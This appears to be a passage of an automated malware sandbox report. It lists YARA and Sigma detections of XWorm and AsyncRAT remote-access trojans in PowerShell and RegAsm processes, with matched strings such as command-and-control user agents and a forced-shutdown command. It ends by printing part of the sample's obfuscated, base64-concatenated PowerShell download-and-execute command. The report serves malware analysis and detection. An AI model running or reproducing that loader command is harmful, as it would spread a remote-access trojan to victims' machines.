Process Memory Space: powershell.exe PID: 2080	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x22e6:$b2: ::FromBase64String( 0x2637:$b2: ::FromBase64String( 0x4cf0:$b2: ::FromBase64String( 0x1c259:$b2: ::FromBase64String( 0x1c5aa:$b2: ::FromBase64String( 0x1f74d:$b2: ::FromBase64String( 0x1fa9e:$b2: ::FromBase64String( 0x20b2e:$b2: ::FromBase64String( 0x20e7f:$b2: ::FromBase64String( 0x36b14:$b2: ::FromBase64String( 0x36e65:$b2: ::FromBase64String( 0x37705:$b2: ::FromBase64String( 0x37a56:$b2: ::FromBase64String( 0x394e6:$b2: ::FromBase64String( 0x39837:$b2: ::FromBase64String( 0x3e3fa:$b2: ::FromBase64String( 0x3e74b:$b2: ::FromBase64String( 0x22c5:$b3: ::UTF8.GetString( 0x2547:$b3: ::UTF8.GetString( 0x1c238:$b3: ::UTF8.GetString( 0x1c4ba:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 2300	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x62508:$b2: ::FromBase64String( 0x6a443:$b2: ::FromBase64String( 0x11094a:$b2: ::FromBase64String( 0x1109b8:$b2: ::FromBase64String( 0x1e4ca7:$b2: ::FromBase64String( 0x1e4d16:$b2: ::FromBase64String( 0x225229:$b2: ::FromBase64String( 0x225298:$b2: ::FromBase64String( 0x23d9f9:$b2: ::FromBase64String( 0x54d82:$s1: -join 0x60344:$s1: -join 0x6e9ed:$s1: -join 0x6eb79:$s1: -join 0x73231:$s1: -join 0x9b634:$s1: -join 0xa8709:$s1: -join 0xabadb:$s1: -join 0xac18d:$s1: -join 0xadc7e:$s1: -join 0xafe84:$s1: -join 0xb06ab:$s1: -join
Process Memory Space: powershell.exe PID: 7904	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 7904	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x30419:$b2: ::FromBase64String( 0x37f73:$b2: ::FromBase64String( 0x8c6f4:$b2: ::FromBase64String( 0xc3dc1:$b2: ::FromBase64String( 0xc74bf:$b2: ::FromBase64String( 0x99108:$s1: -join 0x15ed00:$s1: -join 0x4b35a:$s3: reverse 0x5523d:$s3: reverse 0x5c3b3:$s3: reverse 0x657b9:$s3: reverse 0x1230d3:$s3: reverse 0x129d28:$s3: reverse 0x12bcdf:$s3: reverse 0x136d0e:$s3: reverse 0x148239:$s3: reverse 0x148527:$s3: reverse 0x148c41:$s3: reverse 0x1493fa:$s3: reverse 0x1504aa:$s3: reverse 0x1508c4:$s3: reverse
Process Memory Space: powershell.exe PID: 8644	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 8644	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8d68c:$b2: ::FromBase64String( 0x90d8b:$b2: ::FromBase64String( 0xa3ac7:$b2: ::FromBase64String( 0xab621:$b2: ::FromBase64String( 0xfded3:$s1: -join 0x105980:$s1: -join 0xc1c13:$s3: reverse 0xc8895:$s3: reverse 0xca728:$s3: reverse 0xd5757:$s3: reverse 0xdfaac:$s3: reverse 0xeb1e5:$s3: reverse 0x129b6a:$s3: reverse 0x129e58:$s3: reverse 0x12a572:$s3: reverse 0x12ad2b:$s3: reverse 0x131c69:$s3: reverse 0x132083:$s3: reverse 0x132c0b:$s3: reverse 0x1338b8:$s3: reverse 0xfa035:$s4: +=
Process Memory Space: RegAsm.exe PID: 8864	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
64.2.powershell.exe.208006e8178.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
64.2.powershell.exe.208006e8178.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x45d7:$str01: $VB$Local_Port 0x45c8:$str02: $VB$Local_Host 0x485d:$str03: get_Jpeg 0x4287:$str04: get_ServicePack 0x5336:$str05: Select * from AntivirusProduct 0x5534:$str06: PCRestart 0x5548:$str07: shutdown.exe /f /r /t 0 0x55fa:$str08: StopReport 0x55d0:$str09: StopDDos 0x56d2:$str10: sendPlugin 0x587e:$str12: -ExecutionPolicy Bypass -File " 0x59a7:$str13: Content-length: 5235
64.2.powershell.exe.208006e8178.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5cb1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5dc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58c2:$cnc4: POST / HTTP/1.1
49.2.powershell.exe.26c57b16cb8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
49.2.powershell.exe.26c57b16cb8.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x45d7:$str01: $VB$Local_Port 0x45c8:$str02: $VB$Local_Host 0x485d:$str03: get_Jpeg 0x4287:$str04: get_ServicePack 0x5336:$str05: Select * from AntivirusProduct 0x5534:$str06: PCRestart 0x5548:$str07: shutdown.exe /f /r /t 0 0x55fa:$str08: StopReport 0x55d0:$str09: StopDDos 0x56d2:$str10: sendPlugin 0x587e:$str12: -ExecutionPolicy Bypass -File " 0x59a7:$str13: Content-length: 5235
49.2.powershell.exe.26c57b16cb8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5cb1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5dc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58c2:$cnc4: POST / HTTP/1.1
45.2.RegAsm.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
45.2.RegAsm.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
45.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
57.2.powershell.exe.117de8f7d58.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
57.2.powershell.exe.117de8f7d58.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x45d7:$str01: $VB$Local_Port 0x45c8:$str02: $VB$Local_Host 0x485d:$str03: get_Jpeg 0x4287:$str04: get_ServicePack 0x5336:$str05: Select * from AntivirusProduct 0x5534:$str06: PCRestart 0x5548:$str07: shutdown.exe /f /r /t 0 0x55fa:$str08: StopReport 0x55d0:$str09: StopDDos 0x56d2:$str10: sendPlugin 0x587e:$str12: -ExecutionPolicy Bypass -File " 0x59a7:$str13: Content-length: 5235
57.2.powershell.exe.117de8f7d58.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5cb1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5dc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58c2:$cnc4: POST / HTTP/1.1
41.2.powershell.exe.2002c7f3a58.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
41.2.powershell.exe.2002c7f3a58.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x45d7:$str01: $VB$Local_Port 0x45c8:$str02: $VB$Local_Host 0x485d:$str03: get_Jpeg 0x4287:$str04: get_ServicePack 0x5336:$str05: Select * from AntivirusProduct 0x5534:$str06: PCRestart 0x5548:$str07: shutdown.exe /f /r /t 0 0x55fa:$str08: StopReport 0x55d0:$str09: StopDDos 0x56d2:$str10: sendPlugin 0x587e:$str12: -ExecutionPolicy Bypass -File " 0x59a7:$str13: Content-length: 5235
41.2.powershell.exe.2002c7f3a58.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5cb1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5dc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58c2:$cnc4: POST / HTTP/1.1
28.2.powershell.exe.22801af67f0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.22801af67f0.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x45d7:$str01: $VB$Local_Port 0x45c8:$str02: $VB$Local_Host 0x485d:$str03: get_Jpeg 0x4287:$str04: get_ServicePack 0x5336:$str05: Select * from AntivirusProduct 0x5534:$str06: PCRestart 0x5548:$str07: shutdown.exe /f /r /t 0 0x55fa:$str08: StopReport 0x55d0:$str09: StopDDos 0x56d2:$str10: sendPlugin 0x587e:$str12: -ExecutionPolicy Bypass -File " 0x59a7:$str13: Content-length: 5235
28.2.powershell.exe.22801af67f0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5c14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5cb1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5dc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58c2:$cnc4: POST / HTTP/1.1
41.2.powershell.exe.2002c7f3a58.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
41.2.powershell.exe.2002c7f3a58.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x1781f6:$str12: -ExecutionPolicy Bypass -File " 0x17826a:$str12: -ExecutionPolicy Bypass -File " 0x178322:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
41.2.powershell.exe.2002c7f3a58.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
49.2.powershell.exe.26c57b12b58.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
49.2.powershell.exe.26c57b12b58.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xa537:$str01: $VB$Local_Port 0xa528:$str02: $VB$Local_Host 0xa7bd:$str03: get_Jpeg 0xa1e7:$str04: get_ServicePack 0xb296:$str05: Select * from AntivirusProduct 0xb494:$str06: PCRestart 0xb4a8:$str07: shutdown.exe /f /r /t 0 0xb55a:$str08: StopReport 0xb530:$str09: StopDDos 0xb632:$str10: sendPlugin 0xb7de:$str12: -ExecutionPolicy Bypass -File " 0xb907:$str13: Content-length: 5235
49.2.powershell.exe.26c57b12b58.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbb74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb822:$cnc4: POST / HTTP/1.1
28.2.powershell.exe.22801af2690.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.22801af2690.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xa537:$str01: $VB$Local_Port 0xa528:$str02: $VB$Local_Host 0xa7bd:$str03: get_Jpeg 0xa1e7:$str04: get_ServicePack 0xb296:$str05: Select * from AntivirusProduct 0xb494:$str06: PCRestart 0xb4a8:$str07: shutdown.exe /f /r /t 0 0xb55a:$str08: StopReport 0xb530:$str09: StopDDos 0xb632:$str10: sendPlugin 0xb7de:$str12: -ExecutionPolicy Bypass -File " 0x17099e:$str12: -ExecutionPolicy Bypass -File " 0x170a12:$str12: -ExecutionPolicy Bypass -File " 0x170aca:$str12: -ExecutionPolicy Bypass -File " 0xb907:$str13: Content-length: 5235
28.2.powershell.exe.22801af2690.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbb74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb822:$cnc4: POST / HTTP/1.1
49.2.powershell.exe.26c57b16cb8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
49.2.powershell.exe.26c57b16cb8.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
49.2.powershell.exe.26c57b16cb8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
64.2.powershell.exe.208006e8178.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
64.2.powershell.exe.208006e8178.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
64.2.powershell.exe.208006e8178.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
57.2.powershell.exe.117de8f7d58.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
57.2.powershell.exe.117de8f7d58.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
57.2.powershell.exe.117de8f7d58.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
64.2.powershell.exe.208006e4018.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
64.2.powershell.exe.208006e4018.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xa537:$str01: $VB$Local_Port 0xa528:$str02: $VB$Local_Host 0xa7bd:$str03: get_Jpeg 0xa1e7:$str04: get_ServicePack 0xb296:$str05: Select * from AntivirusProduct 0xb494:$str06: PCRestart 0xb4a8:$str07: shutdown.exe /f /r /t 0 0xb55a:$str08: StopReport 0xb530:$str09: StopDDos 0xb632:$str10: sendPlugin 0xb7de:$str12: -ExecutionPolicy Bypass -File " 0xb907:$str13: Content-length: 5235
64.2.powershell.exe.208006e4018.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbb74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb822:$cnc4: POST / HTTP/1.1
57.2.powershell.exe.117de8f3be0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
57.2.powershell.exe.117de8f3be0.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xa54f:$str01: $VB$Local_Port 0xa540:$str02: $VB$Local_Host 0xa7d5:$str03: get_Jpeg 0xa1ff:$str04: get_ServicePack 0xb2ae:$str05: Select * from AntivirusProduct 0xb4ac:$str06: PCRestart 0xb4c0:$str07: shutdown.exe /f /r /t 0 0xb572:$str08: StopReport 0xb548:$str09: StopDDos 0xb64a:$str10: sendPlugin 0xb7f6:$str12: -ExecutionPolicy Bypass -File " 0xb91f:$str13: Content-length: 5235
57.2.powershell.exe.117de8f3be0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbb8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc29:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd3e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb83a:$cnc4: POST / HTTP/1.1
41.2.powershell.exe.2002c7ef8e0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
41.2.powershell.exe.2002c7ef8e0.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xa54f:$str01: $VB$Local_Port 0xa540:$str02: $VB$Local_Host 0xa7d5:$str03: get_Jpeg 0xa1ff:$str04: get_ServicePack 0xb2ae:$str05: Select * from AntivirusProduct 0xb4ac:$str06: PCRestart 0xb4c0:$str07: shutdown.exe /f /r /t 0 0xb572:$str08: StopReport 0xb548:$str09: StopDDos 0xb64a:$str10: sendPlugin 0xb7f6:$str12: -ExecutionPolicy Bypass -File " 0x17c36e:$str12: -ExecutionPolicy Bypass -File " 0x17c3e2:$str12: -ExecutionPolicy Bypass -File " 0x17c49a:$str12: -ExecutionPolicy Bypass -File " 0xb91f:$str13: Content-length: 5235
41.2.powershell.exe.2002c7ef8e0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbb8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc29:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd3e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb83a:$cnc4: POST / HTTP/1.1
28.2.powershell.exe.22801af67f0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.22801af67f0.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x63d7:$str01: $VB$Local_Port 0x63c8:$str02: $VB$Local_Host 0x665d:$str03: get_Jpeg 0x6087:$str04: get_ServicePack 0x7136:$str05: Select * from AntivirusProduct 0x7334:$str06: PCRestart 0x7348:$str07: shutdown.exe /f /r /t 0 0x73fa:$str08: StopReport 0x73d0:$str09: StopDDos 0x74d2:$str10: sendPlugin 0x767e:$str12: -ExecutionPolicy Bypass -File " 0x16c83e:$str12: -ExecutionPolicy Bypass -File " 0x16c8b2:$str12: -ExecutionPolicy Bypass -File " 0x16c96a:$str12: -ExecutionPolicy Bypass -File " 0x77a7:$str13: Content-length: 5235
28.2.powershell.exe.22801af67f0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7a14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ab1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7bc6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x76c2:$cnc4: POST / HTTP/1.1
Click to see the 43 entries

Other

Source	Rule	Description	Author	Strings
amsi64_2080.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 